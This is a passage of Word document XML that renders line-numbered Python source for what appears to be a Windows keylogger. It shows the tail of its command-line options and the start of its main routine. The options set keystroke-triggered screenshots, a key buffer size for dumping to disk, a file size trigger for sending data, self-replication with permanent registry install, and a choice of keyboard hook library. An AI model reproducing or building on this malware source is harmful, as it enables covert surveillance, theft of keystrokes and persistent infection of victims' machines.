        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s41"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t>'--keystoscreenshot'</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6" w:name="l779"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">779  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="112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umber of keystrokes to take a screenshot.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7" w:name="l780"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">780  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="112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c'</w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s31"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s41"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t>'--keyminchars'</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8" w:name="l781"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">781  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="112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Minimum key buffer size to dump data to disk.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9" w:name="l782"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">782  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="112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t'</w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s31"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s41"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t>'--filesizetrigger'</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30" w:name="l783"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">783  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="113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File size trigger to send data.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31" w:name="l784"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">784  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="113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replicat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32" w:name="l785"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">785  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="113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elf-replicate and permanent install into registry'</w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s31"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00472EBD" w:rsidRPr="00D566BA" w:rsidRDefault="00472EBD">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="901450420"/>
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="1133" w:name="l786"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">786  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="113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oscreensho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34" w:name="l787"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">787  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="113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isable Screenshot capture'</w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s31"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00472EBD" w:rsidRPr="00D566BA" w:rsidRDefault="00472EBD">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="901450420"/>
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="1135" w:name="l788"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">788  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="113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m'</w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s31"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s41"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t>'--hookmodul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6" w:name="l789"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">789  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="113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Hook module to use. 0=pyWinHook, 1=pynput. Default value: 0'</w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s31"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00472EBD" w:rsidRPr="00D566BA" w:rsidRDefault="00472EBD">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="901450420"/>
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="1137" w:name="l790"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">790  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="113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v'</w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s31"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s41"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t>'--verbos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61"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s31"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s61"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s31"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s61"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t>4</w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s31"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s61"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t>5</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8" w:name="l791"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">791  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="113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ebug verbose to console when testing. Default value: 0'</w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s31"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00472EBD" w:rsidRPr="00D566BA" w:rsidRDefault="00472EBD">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="901450420"/>
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="1139" w:name="l792"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">792  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="113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f'</w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s31"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s41"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t>'--logtofil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40" w:name="l793"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">793  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="114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If set, log messages are saved to {}. Default value: 0'</w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s31"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s11"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t>format</w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s31"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s11"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t>LOG_FILENAME</w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s31"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t>))</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00472EBD" w:rsidRPr="00D566BA" w:rsidRDefault="00472EBD">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="901450420"/>
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="1141" w:name="l794"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">794  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="1141"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s11"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">args_parsed </w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s21"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">= </w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s11"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t>parser</w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s31"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s11"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t>parse_args</w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s31"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t>()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00472EBD" w:rsidRPr="00D566BA" w:rsidRDefault="00472EBD">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="901450420"/>
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="1142" w:name="l795"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">795  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="1142"/>
    </w:p>
    <w:p w:rsidR="00472EBD" w:rsidRPr="00D566BA" w:rsidRDefault="00472EBD">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="901450420"/>
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="1143" w:name="l796"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">796  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="1143"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s21"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">return </w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s11"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t>args_parsed</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00472EBD" w:rsidRPr="00D566BA" w:rsidRDefault="00472EBD">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="901450420"/>
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="1144" w:name="l797"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">797  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="1144"/>
    </w:p>
    <w:p w:rsidR="00472EBD" w:rsidRPr="00D566BA" w:rsidRDefault="00472EBD">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="901450420"/>
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="1145" w:name="l798"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">798  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="1145"/>
    </w:p>
    <w:p w:rsidR="00472EBD" w:rsidRPr="00D566BA" w:rsidRDefault="00472EBD">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="901450420"/>
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="1146" w:name="l799"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">799  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="1146"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s01"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t>########################################################</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00472EBD" w:rsidRPr="00D566BA" w:rsidRDefault="00472EBD">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="901450420"/>
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="1147" w:name="l800"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">800  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="1147"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s01"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t># MAIN</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00472EBD" w:rsidRPr="00D566BA" w:rsidRDefault="00472EBD">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="901450420"/>
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="1148" w:name="l801"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">801  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="1148"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s01"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t>########################################################</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00472EBD" w:rsidRPr="00D566BA" w:rsidRDefault="00472EBD">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="901450420"/>
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="1149" w:name="l802"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">802  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="1149"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s11"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">args </w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s21"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">= </w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s11"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t>parse_params</w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s31"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">()  </w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s01"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t># Check and parse parameters</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00472EBD" w:rsidRPr="00D566BA" w:rsidRDefault="00472EBD">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="901450420"/>
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="1150" w:name="l803"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">803  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="1150"/>
    </w:p>
    <w:p w:rsidR="00472EBD" w:rsidRPr="00D566BA" w:rsidRDefault="00472EBD">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="901450420"/>
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="1151" w:name="l804"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">804  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="1151"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s01"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t># Sets logging settings</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00472EBD" w:rsidRPr="00D566BA" w:rsidRDefault="00472EBD">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="901450420"/>
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="1152" w:name="l805"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">805  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="1152"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s11"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">log_format </w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s21"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">= </w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s41"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t>'%(asctime)s %(levelname)08s: L%(lineno)4s %(funcName)25s(): %(message)s'</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00472EBD" w:rsidRPr="00D566BA" w:rsidRDefault="00472EBD">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="901450420"/>
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="1153" w:name="l806"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">806  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="1153"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s11"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">log_date_fmt </w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s21"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">= </w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s41"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t>'%d/%m/%Y %I:%M:%S %p'</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00472EBD" w:rsidRPr="00D566BA" w:rsidRDefault="00472EBD">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="901450420"/>
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="1154" w:name="l807"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">807  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="1154"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s11"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">log_handlers </w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s21"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">= </w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s31"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t>[</w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s11"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t>logging</w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s31"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s11"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t>StreamHandler</w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s31"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">()]  </w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s01"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t># Default Log handler console</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00472EBD" w:rsidRPr="00D566BA" w:rsidRDefault="00472EBD">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="901450420"/>
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="1155" w:name="l808"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">808  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="1155"/>
    </w:p>
    <w:p w:rsidR="00472EBD" w:rsidRPr="00D566BA" w:rsidRDefault="00472EBD">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="901450420"/>
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="1156" w:name="l809"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">809  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="1156"/>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logtofile</w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s21"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00472EBD" w:rsidRPr="00D566BA" w:rsidRDefault="00472EBD">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="901450420"/>
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="1157" w:name="l810"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">810  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="1157"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s11"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t>log_handlers</w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s31"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s11"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t>append</w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s31"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s11"/>
          <w:szCs w:val="12"/>
        </w:rPr>
